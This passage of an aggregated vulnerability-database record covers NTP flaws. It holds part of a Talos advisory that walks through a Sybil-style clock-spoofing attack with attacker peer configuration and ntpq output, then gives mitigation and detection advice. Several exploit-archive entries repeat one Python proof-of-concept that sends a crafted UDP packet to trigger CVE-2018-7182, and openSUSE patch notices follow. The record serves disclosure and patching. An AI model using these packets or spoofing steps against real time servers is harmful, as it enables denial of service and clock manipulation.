querying ntp-client-4.2.8p4 for its active peer associations with:\n \n \n ntpq -c lpeer\n \n\nInitially, ntp-client-4.2.8p4 is peered with one legitimate server (ntp-server).\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server .LOCL. 1 u 5 8 377 0.043 -0.051 0.414\n \n\nAs a proof-of-concept, the attacker will attempt to move the victim\u2019s clock back by an amount just under the panic threshold, 15 minutes in this case. (Significantly larger steps have been achieved with some ntpd releases.) The attacker spins up three attacking nodes at different IP addresses (attacker1..3).\n\nAfter the attacking nodes are well synchronized, the attacker commences the attack by adding the following configuration line to each attacking node instructing it to peer with the victim using keyid 2:\n \n \n peer ntp-client-4.2.8p4 key 2 noselect minpoll 3 maxpoll 3\n \n\nAs a result, we see that ntp-client-4.2.8p4 now has 3 new malicious peers.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server .LOCL. 1 u 3 8 377 0.130 0.479 0.399\n attacker1 .LOCL. 1 S 5 8 1 0.000 0.000 0.000\n attacker2 192.168.33.14 2 S 5 8 1 0.000 0.000 0.000\n attacker3 192.168.33.14 2 S 4 8 1 0.000 0.000 0.000\n \n\nThe attackers consistently provide time advertisements that are about 15 minutes behind the time advertised by the legitimate ntp-server. Because the attackers outnumber legitimate peers, eventually the victim selects an attacker as its system peer indicating that it will synchronize its time to the attackers.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n xntp-server .LOCL. 1 u 1 8 377 0.130 0.479 0.501\n *attacker1 .LOCL. 1 S 2 8 3 0.457 -931554 0.000\n +attacker2 192.168.33.14 2 S 2 8 3 0.644 -931553 0.000\n +attacker3 192.168.33.14 2 S 1 8 3 0.583 -931553 0.000\n \n\nEventually, the victim steps its clock.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n ntp-server .STEP. 16 u - 8 0 0.000 0.000 0.000\n attacker1 .STEP. 16 S 14 8 0 0.000 0.000 0.000\n attacker2 .STEP. 16 S 52 8 0 0.000 0.000 0.000\n attacker3 .STEP. 16 S 45 8 0 0.000 0.000 0.000\n \n\nAfter stepping the clock, we see that the victim is 931 seconds behind ntp-server confirming the attack.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server .LOCL. 1 u 2 8 1 0.379 931553. 0.317\n attacker1 .STEP. 16 S 19 8 0 0.000 0.000 0.000\n attacker2 .STEP. 16 S 57 8 0 0.000 0.000 0.000\n attacker3 .STEP. 16 S 50 8 0 0.000 0.000 0.000\n \n\nWhile ntp-server is initially selected as the system peer after the clock step, the attacking nodes quickly regain their status as preferred time sources.\n \n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n xntp-server .LOCL. 1 u 5 8 3 0.278 931552. 0.638\n *attacker1 .LOCL. 1 S 4 8 6 0.044 -0.346 0.049\n +attacker2 192.168.33.14 2 S 4 8 6 0.593 0.520 0.441\n +attacker3 192.168.33.14 2 S 3 8 6 0.758 0.020 0.074\n \n\nAt this point, the attacker has control of the victim\u2019s clock and can continue to make modifications.\n\n### MITIGATION\n\nThe most complete mitigation is to upgrade to ntp-TBD or NTPsec TBD. If your system\u2019s ntpd is packaged by the system vendor, apply your vendor\u2019s security update as soon as it becomes available.\n\nAdministrators that are not using authenticated NTP can prevent exploitation by removing any unused \u2018trustedkey\u2019 configuration directives from their ntpd configuration file.\n\nIf your system supports a host-based firewall which blocks incoming traffic, such as the Windows Firewall, Mac OS X Application Firewall, or firewalls such as Uncomplicated Firewall or iptables on Linux, you should enable it.\n\nFor other systems, appropriate firewall rules will depend on your environment. Use the following recommendations as a guideline:\n\n * NTP clients should block incoming NTP packets from any IP address that is not a known, legitimate peer\n\n * NTP servers should block incoming symmetric active (NTP mode 1), server (NTP mode 4), and broadcast (NTP mode 5) packets from any IP address that is not a known, legitimate peer\n\n### DETECTION\n\nIn most common configurations, you can use ntpq to query the ntpd process running on your system for its list of peers. Any unexpected peers that are not configured in your ntp.conf file could indicate an attack. For example, if your system is configured to be a client of ntp-server and you expect one peer (known-peer), the appearance of additional peers (sybil) could indicate an attack:\n \n \n $ ntpq -c lpeer\n \n remote refid st t when poll reach delay offset jitter\n ==============================================================================\n *ntp-server .LOCL. 1 u 1 8 377 0.130 0.479 0.501\n known-peer .LOCL. 1 S 2 8 3 0.457 -931554 0.000\n sybil 192.168.33.14 2 S 2 8 3 0.644 -931553 0.000\n \n\nYou can delete any rogue associations by restarting ntpd after applying the mitigations above.\n\nIf you have a compatible IDS product, the following Snort rules detect exploits of this vulnerability: TBD.\n\nAt the network level, multiple symmetric, broadcast, or manycast associations using the same keyid could indicate an attack.\n\n### TIMELINE\n\n2016-01-19 - CERT reports to NTP\n\n##### Credit\n\nDiscovered by Matthew Van Gundy of Cisco ASIG.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0084\n\nPrevious Report\n\nTALOS-2016-0082\n", "edition": 11, "modified": "2016-04-26T00:00:00", "published": "2016-04-26T00:00:00", "id": "TALOS-2016-0083", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0083", "title": "Network Time Protocol Ephemeral Association Time Spoofing Vulnerability", "type": "talos", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:02", "description": "\nntpd 4.2.8p10 - Out-of-Bounds Read (PoC)", "edition": 1, "published": "2018-11-14T00:00:00", "title": "ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7182"], "modified": "2018-11-14T00:00:00", "id": "EXPLOITPACK:89AFE2575D3AAEFB0E0D6881A13995A5", "href": "", "sourceData": "# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)\n# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam\n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)\n# Website: https://dumpco.re/blog/cve-2018-7182\n# Vendor Homepage: http://www.ntp.org/\n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz\n# Version: ntp 4.2.8p6 - 4.2.8p10\n# CVE: CVE-2018-7182\n\n# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind\n#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf \n#==50079== Memcheck, a memory error detector\n#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. \n#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info\n#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\n#==50079== \n#12 Nov 09:26:19 ntpd[50079]: ntpd 4.2.8p10@1.3728-o Mon Nov 12 08:21:41 UTC 2018 (4): Starting\n#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\n#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19)\n#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123\n#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates\n#==50079== Invalid read of size 1\n#==50079== at 0x12B8CF: ctl_getitem (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== Address 0x6c6b396 is 0 bytes after a block of size 6 alloc'd\n#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\n#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692)\n#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x130A5F: add_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079==\n\n#!/usr/bin/env python\n\nimport sys\nimport socket\n\nbuf = (\"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x39\\x6e\\x6f\\x6e\\x63\" +\n \"\\x65\\x3d\\x64\\x61\\x33\\x65\\x62\\x35\\x31\\x65\\x62\\x30\\x32\\x38\\x38\\x38\" +\n \"\\x64\\x61\\x32\\x30\\x39\\x36\\x34\\x31\\x39\\x63\\x2c\\x20\\x66\\x72\\x61\\x67\" +\n \"\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x00\\x31\\x32\\x37\\x2e\" +\n \"\\x30\\x2e\\x30\\x2e\\x31\\x00\\x00\\x00\")\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(buf, ('127.0.0.1', 123))", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2018-11-16T02:16:00", "description": "", "published": "2018-11-15T00:00:00", "type": "packetstorm", "title": "ntpd 4.2.8p10 Out-Of-Bounds Read ", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7182"], "modified": "2018-11-15T00:00:00", "id": "PACKETSTORM:150341", "href": "https://packetstormsecurity.com/files/150341/ntpd-4.2.8p10-Out-Of-Bounds-Read.html", "sourceData": "`# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC) \n# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam \n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) \n# Website: https://dumpco.re/blog/cve-2018-7182 \n# Vendor Homepage: http://www.ntp.org/ \n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz \n# Version: ntp 4.2.8p6 - 4.2.8p10 \n# CVE: CVE-2018-7182 \n \n# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind \n#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf \n#==50079== Memcheck, a memory error detector \n#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. \n#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info \n#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf \n#==50079== \n#12 Nov 09:26:19 ntpd[50079]: ntpd 4.2.8p10@1.3728-o Mon Nov 12 08:21:41 UTC 2018 (4): Starting \n#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf \n#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19) \n#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log \n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123 \n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123 \n#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates \n#==50079== Invalid read of size 1 \n#==50079== at 0x12B8CF: ctl_getitem (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== Address 0x6c6b396 is 0 bytes after a block of size 6 alloc'd \n#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296) \n#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692) \n#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x130A5F: add_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \n#==50079== \n \n#!/usr/bin/env python \n \nimport sys \nimport socket \n \nbuf = (\"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x39\\x6e\\x6f\\x6e\\x63\" + \n\"\\x65\\x3d\\x64\\x61\\x33\\x65\\x62\\x35\\x31\\x65\\x62\\x30\\x32\\x38\\x38\\x38\" + \n\"\\x64\\x61\\x32\\x30\\x39\\x36\\x34\\x31\\x39\\x63\\x2c\\x20\\x66\\x72\\x61\\x67\" + \n\"\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x00\\x31\\x32\\x37\\x2e\" + \n\"\\x30\\x2e\\x30\\x2e\\x31\\x00\\x00\\x00\") \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nsock.sendto(buf, ('127.0.0.1', 123)) \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150341/ntpd428p10-oobread.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:22", "description": "", "published": "2018-11-14T00:00:00", "type": "exploitdb", "title": "ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7182"], "modified": "2018-11-14T00:00:00", "id": "EDB-ID:45846", "href": "https://www.exploit-db.com/exploits/45846", "sourceData": "# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)\r\n# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam\r\n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)\r\n# Website: https://dumpco.re/blog/cve-2018-7182\r\n# Vendor Homepage: http://www.ntp.org/\r\n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz\r\n# Version: ntp 4.2.8p6 - 4.2.8p10\r\n# CVE: CVE-2018-7182\r\n\r\n# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind\r\n#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf \r\n#==50079== Memcheck, a memory error detector\r\n#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. \r\n#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info\r\n#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\r\n#==50079== \r\n#12 Nov 09:26:19 ntpd[50079]: ntpd 4.2.8p10@1.3728-o Mon Nov 12 08:21:41 UTC 2018 (4): Starting\r\n#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\r\n#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19)\r\n#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log\r\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates\r\n#==50079== Invalid read of size 1\r\n#==50079== at 0x12B8CF: ctl_getitem (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== Address 0x6c6b396 is 0 bytes after a block of size 6 alloc'd\r\n#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692)\r\n#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x130A5F: add_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \r\n#==50079==\r\n\r\n#!/usr/bin/env python\r\n\r\nimport sys\r\nimport socket\r\n\r\nbuf = (\"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x39\\x6e\\x6f\\x6e\\x63\" +\r\n \"\\x65\\x3d\\x64\\x61\\x33\\x65\\x62\\x35\\x31\\x65\\x62\\x30\\x32\\x38\\x38\\x38\" +\r\n \"\\x64\\x61\\x32\\x30\\x39\\x36\\x34\\x31\\x39\\x63\\x2c\\x20\\x66\\x72\\x61\\x67\" +\r\n \"\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x00\\x31\\x32\\x37\\x2e\" +\r\n \"\\x30\\x2e\\x30\\x2e\\x31\\x00\\x00\\x00\")\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(buf, ('127.0.0.1', 123))", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45846"}], "zdt": [{"lastseen": "2018-11-19T19:13:48", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-11-14T00:00:00", "title": "ntpd 4.2.8p10 - Out-of-Bounds Read Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7182"], "modified": "2018-11-14T00:00:00", "id": "1337DAY-ID-31596", "href": "https://0day.today/exploit/description/31596", "sourceData": "# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)\r\n# Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam\r\n# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)\r\n# Website: https://dumpco.re/blog/cve-2018-7182\r\n# Vendor Homepage: http://www.ntp.org/\r\n# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p10.tar.gz\r\n# Version: ntp 4.2.8p6 - 4.2.8p10\r\n# CVE: CVE-2018-7182\r\n \r\n# Note: this PoC exploit only crashes the target when target is ran under a memory sanitiser such as ASan / Valgrind\r\n#$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf \r\n#==50079== Memcheck, a memory error detector\r\n#==50079== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. \r\n#==50079== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info\r\n#==50079== Command: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\r\n#==50079== \r\n#12 Nov 09:26:19 ntpd[50079]: ntpd [email\u00a0protected] Mon Nov 12 08:21:41 UTC 2018 (4): Starting\r\n#12 Nov 09:26:19 ntpd[50079]: Command line: ./ntpd/ntpd -n -c /home/magnus/resources/ntp.conf\r\n#12 Nov 09:26:19 ntpd[50079]: proto: precision = 1.331 usec (-19)\r\n#12 Nov 09:26:19 ntpd[50079]: switching logging to file /tmp/ntp.log\r\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 0 v6wildcard [::]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen and drop on 1 v4wildcard 0.0.0.0:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 2 lo 127.0.0.1:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 3 eth0 172.16.193.132:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 4 lo [::1]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listen normally on 5 eth0 [fe80::50:56ff:fe38:d7b8%2]:123\r\n#12 Nov 09:26:19 ntpd[50079]: Listening on routing socket on fd #22 for interface updates\r\n#==50079== Invalid read of size 1\r\n#==50079== at 0x12B8CF: ctl_getitem (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x131BF8: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== Address 0x6c6b396 is 0 bytes after a block of size 6 alloc'd\r\n#==50079== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n#==50079== by 0x4C2AFCF: realloc (vg_replace_malloc.c:692)\r\n#==50079== by 0x17AC63: ereallocz (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x130A5F: add_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x130BC5: set_var (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x131636: read_mru_list (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12FD65: process_control (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x1440F9: receive (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AAA3: ntpdmain (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd)\r\n#==50079== by 0x12AC2C: main (in /home/magnus/projects/ntpd/ntp-4.2.8p10/ntpd/ntpd) \r\n#==50079==\r\n \r\n#!/usr/bin/env python\r\n \r\nimport sys\r\nimport socket\r\n \r\nbuf = (\"\\x16\\x0a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x39\\x6e\\x6f\\x6e\\x63\" +\r\n \"\\x65\\x3d\\x64\\x61\\x33\\x65\\x62\\x35\\x31\\x65\\x62\\x30\\x32\\x38\\x38\\x38\" +\r\n \"\\x64\\x61\\x32\\x30\\x39\\x36\\x34\\x31\\x39\\x63\\x2c\\x20\\x66\\x72\\x61\\x67\" +\r\n \"\\x73\\x3d\\x33\\x32\\x2c\\x20\\x6c\\x61\\x64\\x64\\x72\\x00\\x31\\x32\\x37\\x2e\" +\r\n \"\\x30\\x2e\\x30\\x2e\\x31\\x00\\x00\\x00\")\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(buf, ('127.0.0.1', 123))\n\n# 0day.today [2018-11-19] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31596"}], "suse": [{"lastseen": "2018-10-25T20:31:19", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170"], "description": "NTP was updated to 4.2.8p12 (bsc#1111853):\n\n - CVE-2018-12327: Fixed stack buffer overflow in the openhost()\n command-line call of NTPQ/NTPDC. (bsc#1098531)\n - CVE-2018-7170: Add further tweaks to improve the fix for the ephemeral\n association time spoofing additional protection (bsc#1083424)\n\n Please also see\n <a rel=\"nofollow\" href=\"https://www.nwtime.org/network-time-foundation-publishes-ntp-4-2-8p12/\">https://www.nwtime.org/network-time-foundation-publishes-ntp-4-2-8p12/</a> for\n more information.\n\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-10-25T18:21:54", "published": "2018-10-25T18:21:54", "id": "OPENSUSE-SU-2018:3452-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00069.html", "title": "Security update for ntp (moderate)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-25T20:31:20", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170"], "description": "This update for NTP to version 4.2.8p12 fixes the following\n vulnerabilities (bsc#1111853):\n\n - CVE-2018-12327: Fixed stack buffer overflow in the openhost()\n command-line call of NTPQ/NTPDC. (bsc#1098531)\n - CVE-2018-7170: Add further tweaks to improve the fix for the ephemeral\n association time spoofing additional protection (bsc#1083424)\n\n Please also see\n <a rel=\"nofollow\" href=\"https://www.nwtime.org/network-time-foundation-publishes-ntp-4-2-8p12/\">https://www.nwtime.org/network-time-foundation-publishes-ntp-4-2-8p12/</a> for\n more information.\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\n\n", "edition": 1, "modified": "2018-10-25T18:10:27", "published": "2018-10-25T18:10:27", "id": "OPENSUSE-SU-2018:3438-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00064.html", "title": "Security update for ntp (moderate)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}